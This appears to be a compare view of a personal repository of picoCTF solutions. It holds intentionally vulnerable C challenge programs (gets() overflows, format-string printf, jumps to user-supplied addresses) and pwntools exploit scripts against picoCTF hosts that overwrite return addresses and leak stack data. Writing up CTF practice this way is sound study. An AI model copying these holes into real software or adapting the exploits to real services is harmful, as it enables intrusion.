theon-1/picoCTF
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: theon-1:win_anti_dbg_100
Branches Tags
theon-1:main theon-1:weird_snake theon-1:win_anti_dbg_100 theon-1:endianness_v2 theon-1:poweranalysis_part_1 theon-1:flag_printer theon-1:babygame03
...
compare: theon-1:7f8436f98aba20dfd23f92358da4ac04625f33f9
Branches Tags
theon-1:main theon-1:weird_snake theon-1:win_anti_dbg_100 theon-1:endianness_v2 theon-1:poweranalysis_part_1 theon-1:flag_printer theon-1:babygame03

14 Commits
win_anti_d ... 7f8436f98a

Author SHA1 Message Date
THEON-1
7f8436f98a Clutter Overflow 2025-12-09 12:59:31 +01:00
THEON-1
284e776cd5 flag leak 2025-12-09 11:58:45 +01:00
THEON-1
9acdaa1eed added readme 2025-12-08 14:54:06 +01:00
THEON-1
0fd914ffac RPS 2025-12-08 14:52:34 +01:00
THEON-1
fe67eec9c3 x-sixty-what 2025-12-08 13:36:09 +01:00
THEON-1
9003842333 Basic File Exploit 2025-12-08 11:41:08 +01:00
THEON-1
a3a7081d42 Pie Time 2 2025-12-04 11:53:31 +01:00
THEON-1
18d2c8c2be Pie Time 2025-12-04 11:53:21 +01:00
theon-1
2d01bffb2a Add README.md 2025-10-27 13:48:39 +00:00
THEON-1
60df42d110 direnvrc 2025-10-07 11:59:10 +02:00
Maxime Vorwerk
8f04827901 packer 2025-02-17 11:27:09 +01:00
Maxime Vorwerk
a02132a1e0 solution 2025-02-17 10:57:37 +01:00
Maxime Vorwerk
6ac770c738 moved weird_snake 2025-02-17 09:15:15 +01:00
Maxime Vorwerk
1ecd3903b4 download 2025-02-15 21:39:01 +01:00
29 changed files with 1121 additions and 0 deletions
Expand all files Collapse all files

12
.envrc Normal file
View File

@@ -0,0 +1,12 @@
export MAMBA_EXE='/home/maxime/.local/bin/micromamba';
export MAMBA_ROOT_PREFIX='/home/maxime/.micromamba';
__mamba_setup="$("$MAMBA_EXE" shell hook --shell zsh --root-prefix "$MAMBA_ROOT_PREFIX" 2> /dev/null)"
if [ $? -eq 0 ]; then
eval "$__mamba_setup"
else
alias micromamba="$MAMBA_EXE" # Fallback on help from micromamba activate
fi
unset __mamba_setup
micromamba activate picoCTF

7
README.md Normal file
View File

@@ -0,0 +1,7 @@
# picoCTF
## programs used
- TrID
- exiftool
- aircrack-ng
- kaitai

0
basic_file_exploit/notes.md Normal file
View File

195
basic_file_exploit/program-redacted.c Normal file
View File

@@ -0,0 +1,195 @@
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>
#include <stdint.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#define WAIT 60
static const char* flag = "[REDACTED]";
static char data[10][100];
static int input_lengths[10];
static int inputs = 0;
int tgetinput(char *input, unsigned int l)
{
fd_set input_set;
struct timeval timeout;
int ready_for_reading = 0;
int read_bytes = 0;
if( l <= 0 )
{
printf("'l' for tgetinput must be greater than 0\n");
return -2;
}
/* Empty the FD Set */
FD_ZERO(&input_set );
/* Listen to the input descriptor */
FD_SET(STDIN_FILENO, &input_set);
/* Waiting for some seconds */
timeout.tv_sec = WAIT; // WAIT seconds
timeout.tv_usec = 0; // 0 milliseconds
/* Listening for input stream for any activity */
ready_for_reading = select(1, &input_set, NULL, NULL, &timeout);
/* Here, first parameter is number of FDs in the set,
* second is our FD set for reading,
* third is the FD set in which any write activity needs to updated,
* which is not required in this case.
* Fourth is timeout
*/
if (ready_for_reading == -1) {
/* Some error has occured in input */
printf("Unable to read your input\n");
return -1;
}
if (ready_for_reading) {
read_bytes = read(0, input, l-1);
if(input[read_bytes-1]=='\n'){
--read_bytes;
input[read_bytes]='\0';
}
if(read_bytes==0){
printf("No data given.\n");
return -4;
} else {
return 0;
}
} else {
printf("Timed out waiting for user input. Press Ctrl-C to disconnect\n");
return -3;
}
return 0;
}
static void data_write() {
char input[100];
char len[4];
long length;
int r;
printf("Please enter your data:\n");
r = tgetinput(input, 100);
// Timeout on user input
if(r == -3)
{
printf("Goodbye!\n");
exit(0);
}
while (true) {
printf("Please enter the length of your data:\n");
r = tgetinput(len, 4);
// Timeout on user input
if(r == -3)
{
printf("Goodbye!\n");
exit(0);
}
if ((length = strtol(len, NULL, 10)) == 0) {
puts("Please put in a valid length");
} else {
break;
}
}
if (inputs > 10) {
inputs = 0;
}
strcpy(data[inputs], input);
input_lengths[inputs] = length;
printf("Your entry number is: %d\n", inputs + 1);
inputs++;
}
static void data_read() {
char entry[4];
long entry_number;
char output[100];
int r;
memset(output, '\0', 100);
printf("Please enter the entry number of your data:\n");
r = tgetinput(entry, 4);
// Timeout on user input
if(r == -3)
{
printf("Goodbye!\n");
exit(0);
}
if ((entry_number = strtol(entry, NULL, 10)) == 0) {
puts(flag);
fseek(stdin, 0, SEEK_END);
exit(0);
}
entry_number--;
strncpy(output, data[entry_number], input_lengths[entry_number]);
puts(output);
}
int main(int argc, char** argv) {
char input[3] = {'\0'};
long command;
int r;
puts("Hi, welcome to my echo chamber!");
puts("Type '1' to enter a phrase into our database");
puts("Type '2' to echo a phrase in our database");
puts("Type '3' to exit the program");
while (true) {
r = tgetinput(input, 3);
// Timeout on user input
if(r == -3)
{
printf("Goodbye!\n");
exit(0);
}
if ((command = strtol(input, NULL, 10)) == 0) {
puts("Please put in a valid number");
} else if (command == 1) {
data_write();
puts("Write successful, would you like to do anything else?");
} else if (command == 2) {
if (inputs == 0) {
puts("No data yet");
continue;
}
data_read();
puts("Read successful, would you like to do anything else?");
} else if (command == 3) {
return 0;
} else {
puts("Please type either 1, 2 or 3");
puts("Maybe breaking boundaries elsewhere will be helpful");
}
}
return 0;
}

BIN
clutter_overflow/chall Executable file
View File

Binary file not shown.

54
clutter_overflow/chall.c Normal file
View File

@@ -0,0 +1,54 @@
#include <stdio.h>
#include <stdlib.h>
#define SIZE 0x100
#define GOAL 0xdeadbeef
const char* HEADER =
" ______________________________________________________________________\n"
"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^|\n"
"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |\n"
"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ==================^ ^ ^|\n"
"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ___ ^ ^ ^ ^ / \\^ ^ |\n"
"|^ ^_^ ^ ^ ^ =========^ ^ ^ ^ _ ^ / \\ ^ _ ^ / | | \\^ ^|\n"
"| ^/_\\^ ^ ^ /_________\\^ ^ ^ /_\\ | // | /_\\ ^| | ____ ____ | | ^ |\n"
"|^ =|= ^ =================^ ^=|=^| |^=|=^ | | {____}{____} | |^ ^|\n"
"| ^ ^ ^ ^ | ========= |^ ^ ^ ^ ^\\___/^ ^ ^ ^| |__%%%%%%%%%%%%__| | ^ |\n"
"|^ ^ ^ ^ ^| / ( \\ | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |/ %%%%%%%%%%%%%% \\|^ ^|\n"
".-----. ^ || ) ||^ ^.-------.-------.^| %%%%%%%%%%%%%%%% | ^ |\n"
"| |^ ^|| o ) ( o || ^ | | | | /||||||||||||||||\\ |^ ^|\n"
"| ___ | ^ || | ( )) | ||^ ^| ______|_______|^| |||||||||||||||lc| | ^ |\n"
"|'.____'_^||/!\\@@@@@/!\\|| _'______________.'|== =====\n"
"|\\|______|===============|________________|/|\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
"\" ||\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\" \n"
"\"\"''\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"";
int main(void)
{
long code = 0;
char clutter[SIZE];
setbuf(stdout, NULL);
setbuf(stdin, NULL);
setbuf(stderr, NULL);
puts(HEADER);
puts("My room is so cluttered...");
puts("What do you see?");
gets(clutter);
if (code == GOAL) {
printf("code == 0x%llx: how did that happen??\n", GOAL);
puts("take a flag for your troubles");
system("cat flag.txt");
} else {
printf("code == 0x%llx\n", code);
printf("code != 0x%llx :(\n", GOAL);
}
return 0;
}

55
clutter_overflow/sol.py Executable file
View File

@@ -0,0 +1,55 @@
#!/usr/bin/env python
from pwn import *
def get_conn():
#return process("./chall")
return remote("mars.picoctf.net", 31890)
def try_memory_offset(offset):
cycle = cyclic(length=offset, n=8)
conn = get_conn()
conn.recvuntil(b"see?")
conn.recvline()
conn.sendline(cycle)
conn.recvuntil(b"== ")
result = conn.recvline(keepends=False)
conn.close()
return result
base = 0x100
exp = 0
p = log.progress("searching for variable offset")
while True:
offset = base + 2**exp
p.status(f"trying offset {offset}")
try:
result = try_memory_offset(offset)
except:
base = base + 2**(exp-1)
exp = 0
continue
if result != b"0x0":
next_result = 0
i = 0
while result != next_result:
i += 1
result = next_result
next_result = try_memory_offset(offset+i)
offset = cyclic_find(int(result, 16), n=8)
p.success(f"found result {unhex(result[2:])} at offset {offset}")
break
exp += 1
conn = get_conn()
conn.recvuntil(b"see?")
conn.recvline()
conn.sendline(b"a"*offset + p64(0xdeadbeef))
conn.interactive()

2
flag_leak/.gdb_history Normal file
View File

@@ -0,0 +1,2 @@
disassemble main
exit

29
flag_leak/sol.py Executable file
View File

@@ -0,0 +1,29 @@
#!/usr/bin/env python
from pwn import *
buffer_size = 127
hex_to_read = 127//2
hex_reader = b'%x'*hex_to_read
payload = hex_reader + b'.'
log.info(f"payload: {payload}")
def endian_swap(s, offset=0):
result = b''
for i in range(3+offset, len(s), 4):
result += bytes(reversed(s[i-3:i+1]))
return result
conn = remote("saturn.picoctf.net", 65206)
conn.recvuntil(b" >> ")
conn.sendline(payload)
conn.recvline()
data = conn.recvline(keepends=False)[:-1]
log.info(f"received data: {data}")
unhexed_data = unhex(data)
for i in range(4):
endian_swapped_data = endian_swap(unhexed_data, offset=i)
if b"picoCTF" in endian_swapped_data:
break
log.info(f"processed data: {endian_swapped_data}")

BIN
flag_leak/vuln Executable file
View File

Binary file not shown.

46
flag_leak/vuln.c Normal file
View File

@@ -0,0 +1,46 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <wchar.h>
#include <locale.h>
#define BUFSIZE 64
#define FLAGSIZE 64
void readflag(char* buf, size_t len) {
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,len,f); // size bound read
}
void vuln(){
char flag[BUFSIZE];
char story[128];
readflag(flag, FLAGSIZE);
printf("Tell me a story and then I'll tell you one >> ");
scanf("%127s", story);
printf("Here's a story - \n");
printf(story);
printf("\n");
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
vuln();
return 0;
}

BIN
packer/out Executable file
View File

Binary file not shown.

14
pie_time/.gdb_history Normal file
View File

@@ -0,0 +1,14 @@
exit
exit
help
data
help data
list main
file vuln
list main
exec vuln
exec-file vuln
list main
file vuln
list main
exit

3
pie_time/notes.md Normal file
View File

@@ -0,0 +1,3 @@
- objdump to find adress of main() and win()
- calculate final adress main_address - main_offset + win_offset

BIN
pie_time/vuln Normal file
View File

Binary file not shown.

49
pie_time/vuln.c Normal file
View File

@@ -0,0 +1,49 @@
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void segfault_handler() {
printf("Segfault Occurred, incorrect address.\n");
exit(0);
}
int win() {
FILE *fptr;
char c;
printf("You won!\n");
// Open file
fptr = fopen("flag.txt", "r");
if (fptr == NULL)
{
printf("Cannot open file.\n");
exit(0);
}
// Read contents from file
c = fgetc(fptr);
while (c != EOF)
{
printf ("%c", c);
c = fgetc(fptr);
}
printf("\n");
fclose(fptr);
}
int main() {
signal(SIGSEGV, segfault_handler);
setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
printf("Address of main: %p\n", &main);
unsigned long val;
printf("Enter the address to jump to, ex => 0x12345: ");
scanf("%lx", &val);
printf("Your input: %lx\n", val);
void (*foo)(void) = (void (*)())val;
foo();
}

122
pie_time_2/.gdb_history Normal file
View File

@@ -0,0 +1,122 @@
r
Quit
r
b *0
r
step
step
stepi
next
r
nexti
stepi
break main
r
b
clear 3
clear
exit
break main
r
stepi
stepi
stepi
nexti
step
step
step
step
step
step
step
step
step
step
step
step
step
step
step
exit
b main
r
nexti
stepi
nexti
stack-explore
stackf
hexdump
hexdump $sp
hexdump $sp 128
hexdump $sp 512
ad40a7a0
b main
r
stepi
nexti
r
nexti
step
nexti
stackf
r
nexti
stepi
nexti
stackf
r
nexti
stepi
nexti
stackf
exit
b call_functions
r
nexti
stackf
r
nexti
nexti
stackf
r
nexti
stackf
r
nexti
nexti
stackf
r
nexti
stackf
r
nexti
nexti
stackf
r
nexti
exit
b call_functions+80
b *call_functions+80
r
nexti
stackf
r
nexti
stackf
55559311.f7e0a7a0.f7e0a7a0.55559328.0.340.f7e095c0.252e7825
r
exit
b *call_functions+85
r
stackf
55559311f7e0a7a0f7e0a7a0555593310340f7e095c078257825782578257825782578257825a980000
r
stackf
55559311f7e0a7a0f7e0a7a0555593410340f7e095c0782578257825782578257825782578257825782578257825a0051675000ffffcff055555441ffffd090f7c27635f7fc2000ffffd118ffffd050
r
stackf
r
stackf
r
stackf
exit

30
pie_time_2/notes.md Normal file
View File

@@ -0,0 +1,30 @@
# find main layout with `objdump -d --disassemble=main vuln`
```assembly
0000000000001400 <main>:
1400: f3 0f 1e fa endbr64
1404: 55 push %rbp
1405: 48 89 e5 mov %rsp,%rbp
1408: 48 8d 35 9a fe ff ff lea -0x166(%rip),%rsi # 12a9 <segfault_handler>
140f: bf 0b 00 00 00 mov $0xb,%edi
1414: e8 57 fd ff ff call 1170 <signal@plt>
1419: 48 8b 05 f0 2b 00 00 mov 0x2bf0(%rip),%rax # 4010 <stdout@GLIBC_2.2.5>
1420: b9 00 00 00 00 mov $0x0,%ecx
1425: ba 02 00 00 00 mov $0x2,%edx
142a: be 00 00 00 00 mov $0x0,%esi
142f: 48 89 c7 mov %rax,%rdi
1432: e8 49 fd ff ff call 1180 <setvbuf@plt>
1437: b8 00 00 00 00 mov $0x0,%eax
143c: e8 86 fe ff ff call 12c7 <call_functions>
1441: b8 00 00 00 00 mov $0x0,%eax
1446: 5d pop %rbp
1447: c3 ret
```
# find `main` and `win` locations
```
000000000000136a g F .text 0000000000000096 win
0000000000001400 g F .text 0000000000000048 main
```
# find buffer offset to read return address into `main` via gdb
- %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%lx
- return value $\leftrightarrow$ *main+65 after dot

24
pie_time_2/sol.py Executable file
View File

@@ -0,0 +1,24 @@
#!/usr/bin/env python
from pwn import *
#conn = process("./vuln")
conn = remote('rescued-float.picoctf.net', 49587)
conn.recvuntil(b'name:')
conn.sendline(b'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%lx')
conn.recvuntil(b'.')
return_addr = int(conn.recvline(), 16)
log.info(f"received return addr: {return_addr}")
conn.recvuntil(b'12345: ')
main_offset = 0x1400
win_offset = 0x136a
call_fun_ret_offset = 65
main_addr = return_addr - call_fun_ret_offset
win_offset = main_addr - main_offset + win_offset
conn.sendline(f'{hex(win_offset)}'.encode())
conn.recvline()
conn.interactive()

BIN
pie_time_2/vuln Executable file
View File

Binary file not shown.

56
pie_time_2/vuln.c Normal file
View File

@@ -0,0 +1,56 @@
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void segfault_handler() {
printf("Segfault Occurred, incorrect address.\n");
exit(0);
}
void call_functions() {
char buffer[64];
printf("Enter your name:");
fgets(buffer, 64, stdin);
printf(buffer);
unsigned long val;
printf(" enter the address to jump to, ex => 0x12345: ");
scanf("%lx", &val);
void (*foo)(void) = (void (*)())val;
foo();
}
int win() {
FILE *fptr;
char c;
printf("You won!\n");
// Open file
fptr = fopen("flag.txt", "r");
if (fptr == NULL)
{
printf("Cannot open file.\n");
exit(0);
}
// Read contents from file
c = fgetc(fptr);
while (c != EOF)
{
printf ("%c", c);
c = fgetc(fptr);
}
printf("\n");
fclose(fptr);
}
int main() {
signal(SIGSEGV, segfault_handler);
setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
call_functions();
return 0;
}

154
rps/game-redacted.c Normal file
View File

@@ -0,0 +1,154 @@
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#define WAIT 60
static const char* flag = "[REDACTED]";
char* hands[3] = {"rock", "paper", "scissors"};
char* loses[3] = {"paper", "scissors", "rock"};
int wins = 0;
int tgetinput(char *input, unsigned int l)
{
fd_set input_set;
struct timeval timeout;
int ready_for_reading = 0;
int read_bytes = 0;
if( l <= 0 )
{
printf("'l' for tgetinput must be greater than 0\n");
return -2;
}
/* Empty the FD Set */
FD_ZERO(&input_set );
/* Listen to the input descriptor */
FD_SET(STDIN_FILENO, &input_set);
/* Waiting for some seconds */
timeout.tv_sec = WAIT; // WAIT seconds
timeout.tv_usec = 0; // 0 milliseconds
/* Listening for input stream for any activity */
ready_for_reading = select(1, &input_set, NULL, NULL, &timeout);
/* Here, first parameter is number of FDs in the set,
* second is our FD set for reading,
* third is the FD set in which any write activity needs to updated,
* which is not required in this case.
* Fourth is timeout
*/
if (ready_for_reading == -1) {
/* Some error has occured in input */
printf("Unable to read your input\n");
return -1;
}
if (ready_for_reading) {
read_bytes = read(0, input, l-1);
if(input[read_bytes-1]=='\n'){
--read_bytes;
input[read_bytes]='\0';
}
if(read_bytes==0){
printf("No data given.\n");
return -4;
} else {
return 0;
}
} else {
printf("Timed out waiting for user input. Press Ctrl-C to disconnect\n");
return -3;
}
return 0;
}
bool play () {
char player_turn[100];
srand(time(0));
int r;
printf("Please make your selection (rock/paper/scissors):\n");
r = tgetinput(player_turn, 100);
// Timeout on user input
if(r == -3)
{
printf("Goodbye!\n");
exit(0);
}
int computer_turn = rand() % 3;
printf("You played: %s\n", player_turn);
printf("The computer played: %s\n", hands[computer_turn]);
if (strstr(player_turn, loses[computer_turn])) {
puts("You win! Play again?");
return true;
} else {
puts("Seems like you didn't win this time. Play again?");
return false;
}
}
int main () {
char input[3] = {'\0'};
int command;
int r;
puts("Welcome challenger to the game of Rock, Paper, Scissors");
puts("For anyone that beats me 5 times in a row, I will offer up a flag I found");
puts("Are you ready?");
while (true) {
puts("Type '1' to play a game");
puts("Type '2' to exit the program");
r = tgetinput(input, 3);
// Timeout on user input
if(r == -3)
{
printf("Goodbye!\n");
exit(0);
}
if ((command = strtol(input, NULL, 10)) == 0) {
puts("Please put in a valid number");
} else if (command == 1) {
printf("\n\n");
if (play()) {
wins++;
} else {
wins = 0;
}
if (wins >= 5) {
puts("Congrats, here's the flag!");
puts(flag);
}
} else if (command == 2) {
return 0;
} else {
puts("Please type either 1 or 2");
}
}
return 0;
}

32
rps/sol.py Executable file
View File

@@ -0,0 +1,32 @@
#!/usr/bin/env python
from pwn import *
wins = 0
rounds = 0
def play_round(wins):
conn.recvuntil(b"exit the program")
conn.recvline()
conn.sendline(b"1")
conn.recvuntil(b"s):")
conn.recvline()
conn.sendline(b"rock")
conn.recvuntil(b"computer played")
conn.recvline()
result = conn.recvline()
if b"You win" in result:
return wins+1
else:
return 0
conn = remote("saturn.picoctf.net", 49891)
p = log.progress("brute-forcing solution")
while wins < 5:
rounds += 1
wins = play_round(wins)
p.status(f"round {rounds}, wins: {wins}")
p.success("won 5 rounds")
conn.interactive()

19
weird_snake/rec.py Executable file
View File

@@ -0,0 +1,19 @@
#!/bin/env python
input_list = [4, 54, 41, 0, 112, 32, 25, 49, 33, 3, 0, 0, 57, 32, 108, 23, 48, 4, 9, 70, 7, 110, 36, 8, 108, 7, 49, 10, 4, 86, 43, 110, 43, 88, 0, 67, 104, 125, 9, 78]
key_str = 'J'
key_str = '_' + key_str
key_str = key_str + 'o'
key_str = key_str + '3'
key_str = 't' + key_str
key_list = [ord(char) for char in key_str]
while len(key_list) < len(input_list):
key_list += key_list
result = [a^b for (a, b) in zip(input_list, key_list)]
result_text = ''.join(map(chr, result))
print(result_text)

137
weird_snake/snake Normal file
View File

@@ -0,0 +1,137 @@
1 0 LOAD_CONST 0 (4)
2 LOAD_CONST 1 (54)
4 LOAD_CONST 2 (41)
6 LOAD_CONST 3 (0)
8 LOAD_CONST 4 (112)
10 LOAD_CONST 5 (32)
12 LOAD_CONST 6 (25)
14 LOAD_CONST 7 (49)
16 LOAD_CONST 8 (33)
18 LOAD_CONST 9 (3)
20 LOAD_CONST 3 (0)
22 LOAD_CONST 3 (0)
24 LOAD_CONST 10 (57)
26 LOAD_CONST 5 (32)
28 LOAD_CONST 11 (108)
30 LOAD_CONST 12 (23)
32 LOAD_CONST 13 (48)
34 LOAD_CONST 0 (4)
36 LOAD_CONST 14 (9)
38 LOAD_CONST 15 (70)
40 LOAD_CONST 16 (7)
42 LOAD_CONST 17 (110)
44 LOAD_CONST 18 (36)
46 LOAD_CONST 19 (8)
48 LOAD_CONST 11 (108)
50 LOAD_CONST 16 (7)
52 LOAD_CONST 7 (49)
54 LOAD_CONST 20 (10)
56 LOAD_CONST 0 (4)
58 LOAD_CONST 21 (86)
60 LOAD_CONST 22 (43)
62 LOAD_CONST 17 (110)
64 LOAD_CONST 22 (43)
66 LOAD_CONST 23 (88)
68 LOAD_CONST 3 (0)
70 LOAD_CONST 24 (67)
72 LOAD_CONST 25 (104)
74 LOAD_CONST 26 (125)
76 LOAD_CONST 14 (9)
78 LOAD_CONST 27 (78)
80 BUILD_LIST 40
82 STORE_NAME 0 (input_list)
2 84 LOAD_CONST 28 ('J')
86 STORE_NAME 1 (key_str)
3 88 LOAD_CONST 29 ('_')
90 LOAD_NAME 1 (key_str)
92 BINARY_ADD
94 STORE_NAME 1 (key_str)
4 96 LOAD_NAME 1 (key_str)
98 LOAD_CONST 30 ('o')
100 BINARY_ADD
102 STORE_NAME 1 (key_str)
5 104 LOAD_NAME 1 (key_str)
106 LOAD_CONST 31 ('3')
108 BINARY_ADD
110 STORE_NAME 1 (key_str)
6 112 LOAD_CONST 32 ('t')
114 LOAD_NAME 1 (key_str)
116 BINARY_ADD
118 STORE_NAME 1 (key_str)
9 120 LOAD_CONST 33 (<code object <listcomp> at 0x7ffb38066d40, file "snake.py", line 9>)
122 LOAD_CONST 34 ('<listcomp>')
124 MAKE_FUNCTION 0
126 LOAD_NAME 1 (key_str)
128 GET_ITER
130 CALL_FUNCTION 1
132 STORE_NAME 2 (key_list)
11 >> 134 LOAD_NAME 3 (len)
136 LOAD_NAME 2 (key_list)
138 CALL_FUNCTION 1
140 LOAD_NAME 3 (len)
142 LOAD_NAME 0 (input_list)
144 CALL_FUNCTION 1
146 COMPARE_OP 0 (<)
148 POP_JUMP_IF_FALSE 162
12 150 LOAD_NAME 2 (key_list)
152 LOAD_METHOD 4 (extend)
154 LOAD_NAME 2 (key_list)
156 CALL_METHOD 1
158 POP_TOP
160 JUMP_ABSOLUTE 134
15 >> 162 LOAD_CONST 35 (<code object <listcomp> at 0x7ffb38066df0, file "snake.py", line 15>)
164 LOAD_CONST 34 ('<listcomp>')
166 MAKE_FUNCTION 0
168 LOAD_NAME 5 (zip)
170 LOAD_NAME 0 (input_list)
172 LOAD_NAME 2 (key_list)
174 CALL_FUNCTION 2
176 GET_ITER
178 CALL_FUNCTION 1
180 STORE_NAME 6 (result)
18 182 LOAD_CONST 36 ('')
184 LOAD_METHOD 7 (join)
186 LOAD_NAME 8 (map)
188 LOAD_NAME 9 (chr)
190 LOAD_NAME 6 (result)
192 CALL_FUNCTION 2
194 CALL_METHOD 1
196 STORE_NAME 10 (result_text)
198 LOAD_CONST 37 (None)
200 RETURN_VALUE
Disassembly of <code object <listcomp> at 0x7ffb38066d40, file "snake.py", line 9>:
9 0 BUILD_LIST 0
2 LOAD_FAST 0 (.0)
>> 4 FOR_ITER 12 (to 18)
6 STORE_FAST 1 (char)
8 LOAD_GLOBAL 0 (ord)
10 LOAD_FAST 1 (char)
12 CALL_FUNCTION 1
14 LIST_APPEND 2
16 JUMP_ABSOLUTE 4
>> 18 RETURN_VALUE
Disassembly of <code object <listcomp> at 0x7ffb38066df0, file "snake.py", line 15>:
15 0 BUILD_LIST 0
2 LOAD_FAST 0 (.0)
>> 4 FOR_ITER 16 (to 22)
6 UNPACK_SEQUENCE 2
8 STORE_FAST 1 (a)
10 STORE_FAST 2 (b)
12 LOAD_FAST 1 (a)
14 LOAD_FAST 2 (b)
16 BINARY_XOR
18 LIST_APPEND 2
20 JUMP_ABSOLUTE 4
>> 22 RETURN_VALUE

25
x-sixty-what/.gdb_history Normal file
View File

@@ -0,0 +1,25 @@
show vuln
list vuln
b vuln
exit
info functions
list main
disassemble main
disasm main
disassemble main
disassemble *main
b vuln
exit
disassemble main
disassemble vuln
b vuln+2
b *vuln+2
exit
disassemble vuln
b *vuln+24
run
stackf
nexti
stackf
disassemble flag
exit

19
x-sixty-what/sol.py Executable file
View File

@@ -0,0 +1,19 @@
#!/usr/bin/env python
from pwn import *
buffer_base = 0x7fffffffcf70
ret_addr = 0x7fffffffcfb8
ret_offset = ret_addr - buffer_base
flag_fun_addr = 0x0000000000401236
flag_fun_offset = 5
target_addr = flag_fun_addr + flag_fun_offset
send_buffer = b"a"*ret_offset + p64(target_addr, 'little')
#conn = process("./vuln")
conn = remote('saturn.picoctf.net', 60832)
conn.recvline()
conn.sendline(send_buffer)
conn.interactive()

BIN
x-sixty-what/vuln Executable file
View File

Binary file not shown.

37
x-sixty-what/vuln.c Normal file
View File

@@ -0,0 +1,37 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFFSIZE 64
#define FLAGSIZE 64
void flag() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
printf(buf);
}
void vuln(){
char buf[BUFFSIZE];
gets(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Welcome to 64-bit. Give me a string that gets you the flag: ");
vuln();
return 0;
}